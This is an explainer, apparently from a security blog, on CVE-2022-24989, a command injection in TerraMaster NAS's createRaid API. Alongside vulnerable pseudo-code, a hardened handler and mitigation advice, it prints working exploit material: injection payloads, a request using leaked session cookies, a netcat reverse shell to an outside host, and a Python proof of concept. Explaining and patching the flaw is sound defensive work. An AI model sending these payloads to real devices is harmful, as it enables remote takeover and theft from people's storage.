TerraMaster NAS devices are popular for home and small business file storage. But in early 2022, two major security holes shocked the community: CVE-2022-24989 and CVE-2022-24990. Together, they let hackers take over a TerraMaster from anywhere on the internet—using nothing but a web request.
In this long read, we’ll break down how CVE-2022-24989 works, step by step, with code, easy-to-follow explanations, a PoC (proof-of-concept) exploit, and reference links for further reading.
- Attack Vector: WAN (internet) via a simple HTTP POST
- Public Advisory: NVD Description
This vulnerability lives in the api.php?mobile/createRaid endpoint, where a PHP function that runs system commands is called with untrusted user input and no validation.
The Offending Endpoint
The web API provides a “createRaid” action for remote configuration of RAID arrays. The endpoint is:
/api.php?mobile/createRaid
In the backend, PHP *popen()* is used to run system commands, and the parameters fed to it come straight from the incoming POST request:
- raidtype
- diskstring
Both values are taken directly from the HTTP request and dropped into a system call. If you put a shell metacharacter in raidtype, you can break out and run any command as root.
Here’s a simplified vulnerable code flow (not the actual source):
```php
<?php
// Pseudo-vulnerable handler (simplified; not TerraMaster's actual source)
$raidtype   = $_POST["raidtype"];   // e.g. raid5, but never sanitized!
$diskstring = $_POST["diskstring"]; // e.g. "sda,sdb,sdc"

// Dangerous popen() call: the string is handed to /bin/sh as-is
$cmd = "/sbin/mkraid --type=" . $raidtype . " --disks=" . $diskstring;
$p = popen($cmd, 'r'); // No escaping: a ';' in $raidtype ends the command and starts another
```
Suppose the attacker sends:
```http
POST /api.php?mobile/createRaid HTTP/1.1
Host: NAS-IP
Content-Type: application/x-www-form-urlencoded

raidtype=raid5;id>/tmp/pwned.txt;&diskstring=sda,sdb
```
The command actually executed would become:
```sh
/sbin/mkraid --type=raid5;id>/tmp/pwned.txt;& --disks=sda,sdb
```
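For contrast, here is a hardened version of the same handler, written as an added example (not TerraMaster's code or the actual fix). It keeps the page's /sbin/mkraid, --type and --disks; the list of accepted RAID levels and the sd[a-z] device-name pattern are assumptions. The point is twofold: validate both parameters against an allowlist, and stop building a shell string at all.

```php
<?php
// Hardened version of the pseudo-handler above (added example, not TerraMaster's
// code). /sbin/mkraid, --type and --disks come from the page's pseudo-code; the
// accepted RAID levels and the sd[a-z] device-name pattern are assumptions.

const ALLOWED_RAID_TYPES = ['raid0', 'raid1', 'raid5', 'raid6', 'raid10'];

// Allowlist validation of both POST parameters. Returns [raidtype, [disk, ...]]
// or throws. "raid5;id>/tmp/pwned.txt;" fails simply because it is not a known
// level name: no attempt is made to enumerate "bad" characters.
function validateCreateRaidInput(string $raidtype, string $diskstring): array
{
    if (!in_array($raidtype, ALLOWED_RAID_TYPES, true)) {
        throw new InvalidArgumentException("unknown raidtype");
    }
    $disks = explode(',', $diskstring);
    foreach ($disks as $d) {
        if (!preg_match('/^sd[a-z]{1,2}$/', $d)) {   // "sda", "sdb", ... only
            throw new InvalidArgumentException("bad disk name: " . $d);
        }
    }
    if (count($disks) !== count(array_unique($disks))) {
        throw new InvalidArgumentException("duplicate disk");
    }
    return [$raidtype, $disks];
}

// Build an argv array instead of a shell string. proc_open() with an array
// command (PHP >= 7.4) execs the program directly and never starts /bin/sh, so
// even an unexpected character in an argument cannot become a second command.
function buildMkraidArgv(string $raidtype, array $disks): array
{
    return ['/sbin/mkraid', '--type=' . $raidtype, '--disks=' . implode(',', $disks)];
}

function handleCreateRaid(array $post): void
{
    try {
        [$raidtype, $disks] = validateCreateRaidInput($post['raidtype'] ?? '', $post['diskstring'] ?? '');
    } catch (InvalidArgumentException $e) {
        http_response_code(400);   // reject before anything is executed
        exit('invalid parameters');
    }
    $proc = proc_open(buildMkraidArgv($raidtype, $disks), [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    proc_close($proc);             // real code would read $pipes[1] / $pipes[2] first
}

// Self-check with the page's injection string: rejected, and no command is built.
try { validateCreateRaidInput('raid5;id>/tmp/pwned.txt;', 'sda,sdb'); }
catch (InvalidArgumentException $e) { echo "rejected: " . $e->getMessage() . "\n"; }
```

Even if the handler had to stay on popen(), each value would still need escapeshellarg() after validation; the argv form is preferable because it removes the shell from the picture entirely.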
1. Get a Session (CVE-2022-24990)
You’ll need a valid API token or session cookie. CVE-2022-24990 is a companion bug that lets you dump credentials. You can see attack chain details here.
Example (assuming credentials from the previous bug):
```http
Cookie: UserID=admin; SessionID=YOUR_LEAKED_SESSION_ID
```
2. Send Malicious Request
Then, craft a POST to /api.php?mobile/createRaid, passing your shell payload.
Example Exploit Payload:
```http
POST /api.php?mobile/createRaid HTTP/1.1
Host: NAS-IP
Cookie: UserID=admin; SessionID=leaked-session
Content-Type: application/x-www-form-urlencoded

raidtype=raid5;nc 1.2.3.4 4444 -e /bin/sh;&diskstring=sda,sdb
```
This opens a reverse shell to 1.2.3.4:4444. Netcat must be available on the NAS.
Here is a basic PoC to open a reverse shell (for educational purposes only):
```python
import requests

# Replace with your target NAS IP and credentials
TARGET = "http://192.168.1.100"
SESSION_COOKIE = {"UserID": "admin", "SessionID": "leaked-session"}

reverse_shell = "nc 1.2.3.4 4444 -e /bin/sh"
payload = f"raid5;{reverse_shell};&"

data = {
    "raidtype": payload,
    "diskstring": "sda,sdb",
}

resp = requests.post(
    f"{TARGET}/api.php?mobile/createRaid",
    cookies=SESSION_COOKIE,
    data=data,
)
print("Exploit sent. Check for your reverse shell!")
```
What’s the Impact?
An attacker *anywhere on the internet* can fully compromise a TerraMaster device—steal files, plant ransomware, or use it for further attacks.
Mitigation
1. Update: TerraMaster released a patch in May-June 2022. See the official advisory.
2. Firewall Off WAN: Never expose the NAS UI directly to the public internet!
3. Audit Logs: Check for suspicious requests to /api.php?mobile/createRaid.
References
- CVE-2022-24989 on NVD
- SSD Disclosure — TerraMaster RCE
- TerraMaster Forum Advisory
Final Notes
CVE-2022-24989 is a great lesson in why input validation is critical, especially in web interfaces to powerful devices. If you own a TerraMaster NAS, patch it ASAP—and lock down remote access.
Stay safe, keep things patched, and never trust user input—especially when it lands in a shell command!
*This guide is for educational and defensive purposes only. Don’t use exploits without permission on devices you do not own.*
Timeline
Published on: 08/20/2023 18:15:00 UTC
Last modified on: 08/24/2023 20:52:00 UTC